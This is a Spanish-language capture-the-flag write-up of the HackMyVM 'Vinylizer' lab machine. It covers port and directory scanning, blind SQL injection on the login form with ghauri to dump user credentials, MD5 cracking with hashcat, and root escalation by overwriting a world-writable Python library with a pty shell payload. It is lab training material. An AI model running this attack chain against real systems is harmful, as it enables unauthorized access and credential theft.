cd ~/blog

~/writeups/hmv/020-vinylizer.md

020 - Vinylizer

easy Linux hmv 04-02-2024
Blind SQL InjectionMD5 hash crackingsudo Python script + writable library hijack
hackmyvm.eu/machines/machine.php?vm=Vinylizer

~1 min de lectura


Empezamos con un escaneo general y luego uno específico:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.29
 nmap -sC -sV -p22,80 -oN 02-targeted.txt 192.168.1.29
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 18:34 -03
Nmap scan report for 192.168.1.29
Host is up (0.00039s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 f8:e3:79:35:12:8b:e7:41:d4:27:9d:97:a5:14:b6:16 (ECDSA)
|_  256 e3:8b:15:12:6b:ff:97:57:82:e5:20:58:2d:cb:55:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Vinyl Records Marketplace
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds

Enumeramos con gobuster:

 gobuster dir -u 192.168.1.29 -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt
...
/img                  (Status: 301) [Size: 310] [--> http://192.168.1.29/img/]
/login.php            (Status: 200) [Size: 1408]
/index.html           (Status: 200) [Size: 2326]
...

Al introducir admin' en el login, el sitio arroja un error, indicio de Blind SQLi. Lo confirmamos con ghauri. Primero guardamos la petición en un archivo:

POST /login.php HTTP/1.1
Host: 192.168.1.29
Content-Length: 35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.29
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.29/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9
Cookie: PHPSESSID=e5mbp5mudjppbm5eoi66ts4i0f
Connection: close

username=admin&password=asdf&login=

Cargamos el archivo en ghauri indicando el parámetro username y enumeramos las bases de datos:

 ghauri -r req.txt -p username --dbs
...
available databases [3]:
[*] information_schema
[*] performance_schema
[*] vinyl_marketplace
...

Listamos las tablas de vinyl_marketplace:

 ghauri -r req.txt -p username --dbms mysql -D vinyl_marketplace --tables
...
[1 tables]
+-------+
| users |
+-------+
...

Y volcamos la tabla users:

 ghauri -r req.txt -p username --dbms mysql -D vinyl_marketplace -T users --dump
...
+----+----------------+----------------------------------+-----------+
| id | login_attempts | password                         | username  |
+----+----------------+----------------------------------+-----------+
| 1  | 0              | 9432522ed1a8fca612b11c3980a031f6 | shopadmin |
| 2  | 0              | password123                      | lana      |
+----+----------------+----------------------------------+-----------+
...

La contraseña de shopadmin está hasheada (MD5); la crackeamos con hashcat:

 hashcat -a 0 -m 0 "9432522ed1a8fca612b11c3980a031f6" ~/Documentos/wordlists/rockyou.txt --show
9432522ed1a8fca612b11c3980a031f6:addicted2vinyl
-a 0 -> straight attack mode
-m 0 -> md5 hash mode

Con shopadmin:addicted2vinyl iniciamos sesión y obtenemos la primera flag. Para escalar, revisamos sudo -l:

shopadmin@vinylizer:~$ sudo -l
Matching Defaults entries for shopadmin on vinylizer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User shopadmin may run the following commands on vinylizer:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/vinylizer.py

El script vinylizer.py importa json y random. Comprobamos si tenemos permisos de escritura sobre esas librerías:

shopadmin@vinylizer:/opt$ python3
Python 3.10.12 (main, Nov 20 2023, 15:14:05) [GCC 11.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import json; import random; json; random
<module 'json' from '/usr/lib/python3.10/json/__init__.py'>
<module 'random' from '/usr/lib/python3.10/random.py'>

shopadmin@vinylizer:/opt$ ls -l /usr/lib/python3.10/json/__init__.py
-rw-r--r-- 1 root root 14020 Nov 20 15:14 /usr/lib/python3.10/json/__init__.py
shopadmin@vinylizer:/opt$ ls -l /usr/lib/python3.10/random.py
-rwxrwxrwx 1 root root 33221 Nov 20 15:14 /usr/lib/python3.10/random.py

random.py es escribible, así que hacemos library hijacking: hacemos un backup y la reemplazamos por una versión maliciosa:

shopadmin@vinylizer:~$ cp /usr/lib/python3.10/random.py ./
import pty
pty.spawn("/bin/bash")

Ejecutamos el script como root, que al importar nuestra random maliciosa nos da una shell de root:

shopadmin@vinylizer:~$ sudo /usr/bin/python3 /opt/vinylizer.py

Capturamos la flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados